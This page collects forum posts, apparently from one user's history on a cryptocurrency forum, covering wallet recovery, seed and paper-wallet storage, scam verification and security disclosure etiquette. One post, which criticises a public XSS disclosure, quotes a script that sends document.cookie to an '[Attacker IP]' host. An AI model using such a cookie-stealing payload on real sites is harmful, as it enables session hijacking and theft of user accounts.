The procedure you mentioned, is it complicated?
You basically just have to download a software, follow the guide to verify its signature and then use your 12 words to recover your wallet. That's all. Takes less than 5 minutes. And for the future, you might want to stop using a web wallet. Using a desktop-/mobile wallet gives you way more advantages and decreases the security risks. |
|
|
|
|
Electrum does not use BIP 39.
It has its own mnemonic code derivation. Once the root key (BIP 38) is obtained, the derivation of the keys is the same. But the step from the mnemonic to the root key is different.
You won't be able to recreate your private keys from an electrum mnemonic using a BIP 39 software.
|
|
|
|
The case is quite complicated to me. To be honest I strongly believe this account has placed for sell as per provided all evidence on the post/reply. But since telegram become heaven for scammers and its possible to edit image so red tag shouldn't leave right now IMO.
If we could get any information from a moderator whether the mail address is the correct address of the account, it actually would be enough evidence. But i doubt that any moderator will step in and give out this information "just because" of the sale of an account. |
|
|
|
If you print your seed on a paper, it may leave a file on the system(PC or Laptop) where you are printing which is not safe. Writing seed on a paper using a pen is also safe.
So, do you usually write down a paper wallet including the private key and the QR ? Seems to be quite a lot of work. Printing can under some circumstances leave traces, that's true. Old print jobs might be accessible long time after the print job is done. That's why it is recommended to print from a live booted USB distro and to use a non-network printer with storage for print jobs. You can use a printer without leaving traces, but a few extra steps have to be made. |
|
|
|
I contacted them but they said it's out of control.😓
If there is another way please help me.
I think you misunderstood what pooya87 said: the person controlling the private key of a cryptocurrency address can handle these things [...]
If you are not in control of the private keys, you can do nothing. You made a mistake by sending an altcoin to an BTC address belonging to an exchange. If they don't have the time or simply don't want to help you, you are out of luck. They don't have to help you. If they would, that would be because of a goodwill. |
|
|
|
As for me I love to download files with crack license, sometimes I also think of the risk that my laptop might be compromise but when I tried one time and nothing happens to my files, I then continue to download more files/programs from different forums, [...]
I hope this is some kind of a joke ? You sir, are the next person to ask for help in the technical support section because of that. [...] what's important here is to always read the review and download only those files with good reviews.
I hope you realize that this has nothing to do with the fact that the software includes a backdoor. All those people (including you) care only about the functionality of the software. Instead of buying a license or just using a free open source alternative, you are risking all of your data. If it works you'll find only positive ratings. People using those cracks most probably are already infected. They just don't know and don't care. |
|
|
|
Okay I understand your point. But if you see the screenshot I've shared and dkbit98's own screenshot, there's a small difference. The one I've shared had his email visible, while dkbit98's screenshot has hidden email.
That's true, but he could have manipulated the screenshot to create the impression that he is in possession of the account. You (and we) simply can not be sure. He might be just a scammer without any account. A message however, would unmistakably prove it. |
|
|
|
|
Unfortunately there is no proof that he indeed is in possession of the account.
The next time when bringing something like this up, make sure to gain some proof that he really is in control of the account (e.g. by demanding a PM from this account).
With solid proof, this acc is going to receive negative trust ratings.
|
|
|
|
Things we need to avoid while storing the Private keys are - - Never print on a paper or take a photo of a seed.
We can store the seed using a paper wallet, the cheapest, and the best way to hide the seed. How can you claim that storing the seed printed on paper is insecure, while at the same time recommending a paper wallet? Storing the seed on a piece of paper is not insecure by definition. However it depends on the thread model, as always. If an evil maid scenario is possible for you, storing it in plaintext on a piece of paper is insecure. If your physical storage however is safe, that's not the case. |
|
|
|
Welche Anbieter würdest du für den Wechsel empfehlen?
Eigentlich irgendeinen vertrauneswürdigen Exchange. Ich persönlich würde zu Binance greifen, die Entscheidung liegt aber bei dir. Wenn du von/zu Fiat wechseln möchtest, eignet sich Kraken sehr gut. Wenn du damit diese "Instant Exchanges" meinst.. dann bloß die Finger von sowas lassen.
So gut wie alle scammen Leute systematisch mit KYC.
Welche Anbieter würdest du für den Wechsel empfehlen? nobody01 ich habe es mir erlaubt deinen Beitrag zu editieren. Nicht das hier sonst auf Grund eines fehlenden "bbcode-tags" der Pagiatsbot zuschlägt. Reports gehen doch an den Moderator des Subs, also an dich. Hast du etwa Angst, dass du zu müde/betrunken bist um den fehlenden Quote Tag von Plagiarismus unterscheiden zu können?  |
|
|
|
[...]
I do not know who naypalm is and it seems he last logged a week back is very infrequent here.
So I would disclose the vulnerability to the forum(only).
--------------------------
ENd of PM
--------------------------
So because he logs in infrequently you decided to publicly disclose it ? Because you need the attention and can't wait a month or two for it to be fixed ? All you can do is obviously to use the free version of the burp suite and make popups. You found a reflected XSS, not a persistent one. You like your low-level examples, i understood this already. For example, this: <script>
image = new Image();
image.src='https://[Attacker IP]:8080/?'+document.cookie;
</script>
This is only possible, if the HttpOnly flag is not set. Otherwise the cookie can not be accessed by a script. All you can do with that is to craft an own URL, and send it to someone to have the script being executed. How would you exploit that on such a site, where no valuable or sensitive information is being stored/entered anyway? Short answer: You can't. You are obviously a script kiddy, breaking laws and being a dick, just to gain some attention. You don't understand what you actually found and don't know how this could be exploited. |
|
|
|
Don't do this.This gives you a false sense of security. It is completely absurd to encrypt something with the password being directly accessible. Anyone can access your folder and check the content (including your password) of your script. That's completely useless. @OP The next time you copy something, at least include the URL to the source ( https://www.makeuseof.com/tag/password-protect-folder-windows/). You don't need to plagiarize useless things like this, risking your account to be banned.
|
|
|
|
|
And again..
A completely worthless reflected XSS.
Did you even realize that the connection is not secured by TLS? Do you really think they care about a reflected XSS when they already don't care about security at all ?
Do you have the permission from the owner of the website and the hoster to check for vulnerabilities?
Why did you publicly post it instead of responsibly disclose it to the owner ?
|
|
|
|
What I see is a new hacker trying to prove himself, and doing the right thing by not exploiting what he found.
He did exploit the vulnerability by creating the PoC popup. There is not much more you can do with a reflected XSS on such a site. That's basically it. Warning to future ethical hackers: Do not contact OG about vulnerabilities - he will accuse you of a crime.
An ethical hacker would not start to pentest a site/server without the permission of the owner and hoster. It's more of a script kiddy move. And a pretty dumb one. |
|
|
|
Whether you are actually "import" it into a "software" or enter it into a script doesn't really make a difference.
Difference is in approach. It’s one thing to import a key into software that resides on computer designated for routine day-to-day work and quite another matter to do it with the script (btw, which is easy to check) living on air-gapped device. I think you can understand which one of two is the safest way. You need to keep the context in mind. We were never speaking about air-gapped vs online. HusnaQA simply said: Paper Wallet is only a printout that contains a Bitcoin address or public key that allows transferring coins to the wallet, and a private key that gives access to send funds. This Private Key is imported into other software for sending funds.
That statement itself is true. Whether you import it into a "software" or use a "script", doesn't matter at all. What matter is whether you are entering your private key into an online device or an air-gapped one. But that was never a point from HusnaQA. If we compare air-gapped devices, it doesn't matter whether you use a "software" or a "script". Same for online devices. Offline is better than online. But "software" vs "script" doesn't matter at all. |
|
|
|
Confidentiality: Your mnemonic code is not encrypted. It is visible for anyone who looks for it.
First that one should find it , it is invisible. And yet, does your method not protect the confidentiality of the information. Integrity: Anyone can change your mnemonic, append new words, delete words etc.
Again. try to find it if it is supposed to be invisible And yet, does your method not protect the Integrity. Your method does not increase the security of your data. |
|
|
|
Hide means make something invisible, right? I would use invisible UV ink to write down my explicit SEED between the lines somewhere in the middle of the thick book which is on the shelf among dozens of other books. Conveniently, securely and safely...aren't it?
Where is the security? I don't see any security here: Confidentiality: Your mnemonic code is not encrypted. It is visible for anyone who looks for it. Integrity: Anyone can change your mnemonic, append new words, delete words etc. Availability: Books are not known for being very resilient against water/fire etc. All you did was to hide your mnemonic. Same could be applied by writing it on a piece of paper and putting it into the drawer. Well, I’m not that half-witted to not remember what a single specific book looks like or not memorize the one page number which coincides with my mother’s birthday, squared (everyone can choose his favorite number). And as for degradation - I suppose it could be refreshed any time if nessesary
Despite of the lack of security (as mentioned above), what about an accident (e.g. a car hits you) ? There is nothing against hiding secret information. But you shouldn't exclusively rely on that to secure your information. |
|
|
|
Robust dagegen, dass ein späteres auslesen des Secret auch durch Veränderung des Bildes noch möglich ist.
Wenn ich schon KYC machen muss, dann möchte ich auch gerne etwas im (Perso)Bild verstecken. Sollte das Bild irgendwo anders auftauchen, vielleicht mit anderem Namen und Geburtsdatum, dann hätte ich gerne sowas wie ein transparentes Wasserzeichen o.ä als Secret im Bild versteckt, so dass ich das gegenchecken kann. Und dieses transparente Wasserzeichen als 2. Layer (Ebene) im Bild, welches im Hintergrund versteckt ist. Das Secret sollte dann z.B. lauten: "Upload am 30.02.2020 zu blablabla". Und das wiederholt sich über das ganze Bild.
Habe sonst überlegt, Stereogramme zu nutzen. Also Secret ist versteckt und wenn dann das Halbbild als Lösungsmaske rübergeschoben wird, dann wird das Secret sichtbar. Aber da muss ich mal etwas rumspielen.
Das hättest du gerne auch gleich erwähnen können Steganographie im Sinne von Informationen verstecken und so ein Wasserzeichen werden zwar auf eine ähnliche Weisen realisiert, haben aber unterschiedliche Ziele und daher auch andere Herangehensweisen. Es gibt Algorithmen die sehr robust sind. Damit kannst du recht einfach ein unsichtbares Wasserzeichen einsetzten. Und mit einem Geheimen Schlüssel oder dem Originalbild kannst du das Wasserzeichen dann wieder auslesen. So etwas wird aber häufig für Copyright Zwecke oder Datenerhebungen (e.g. wie oft wurde Werbebild X auf FB geteilt) verwendet. Das wird dich ja nicht direkt davor schützen, dass Quatsch mit deinem Persobild gemacht wird. Wenn es dann hart auf hart kommt, kannst du aber selbstverständlich vor Gericht dennoch beweisen dass da ein Wasserzeichen drin ist. Aber die andere Frage ist.. was hindert dich denn daran ein Wasserzeichen einzusetzten was sagt "KYC für ... Upload 2016" und das dann heute zu verwenden. Später könntest du dann einfach behaupten, dass das Bild 2016 für etwas ganz anderes gemacht wurde. Ich denke so etwas würde rechtlich nicht viel bringen. Besser wäre es, finde ich, ein sichtbares Wasserzeichen zu verwenden. Da aber viele keine bearbeiteten Bilder annehmen wollen, hilft da eig. fast nur ein kleiner Zettel mit dem Datum und Grund des Bildes quasi quer über den Ausweis gelegt ohne wichtige Informationen zu überdecken. Aber denn noch so, dass man es nicht einfach herausschneiden kann. Da kannst du ja quasi nicht betrügen. Niemand würde das Bild heute annehmen wenn da steht "2016.. für X". TLDR: - Digitale Wasserzeichen (unsichtbar) sind an sich eine schöne Sache. Die sind robust und können nicht einfach gelöscht werden. Bringen dir hier leider, meiner Meinung nach, nicht viel.
- Sichtbare digitale Wasserzeichen lassen sich sehr einfach mithilfe von einer einfachen KI entfernen. Bringt also auch nicht so viel.
- Zettel quer über das Bild, sodass man es nicht raus schneiden kann, aber dennoch genug Informationen für den Service bei dem du dich registrierst willst zeigt, halte ich für die beste Methode.
|
|
|
|
So is it right to say in case of etherdelta the private key is stored in my browser cache? If yes that means anyone who can access my cache can also see my key?
I don't know how etherdelta works excactly. But it is not in the cache. It is either in the storage of your browser (most likely since i guess you don't have to "upload" it manually, right?) or a file on your computer (if you need to choose the file each time by "uploading" it). In both cases. If someone has access to your browser (i.e. by having access to your device), and the wallet file / private keys are not encrypted, they have full access, yes. |
|
|
|
Excuse my noobness, but from this official windows binaries build page, if I understand correctly, you need to download a fresh clone from github. BUT, my intention is to build from the file I downloaded, which is Electrum-3.3.8.tar.gz which I extracted to Electrum-3.3.8 directory. I only want to build Electrum Standalone Executable from this directory and not from a clone from github. Is this the only possibility? Can anyone confirm? Yes / No If cloning from github is the only possibility to do this, then I've set up an unrealistic goal from the start which only became apparent now  You don't need to clone it from github again. You can definitely use your downloaded (and extracted) .tar.gz. Just skip the following commands: $ git checkout $REV
You can keep the rest as it is. Just make sure that your extracted archive is in the folder "electrum" as it would be when cloning the repository directly and you are fine to go. |
|
|
|
|
Show Posts
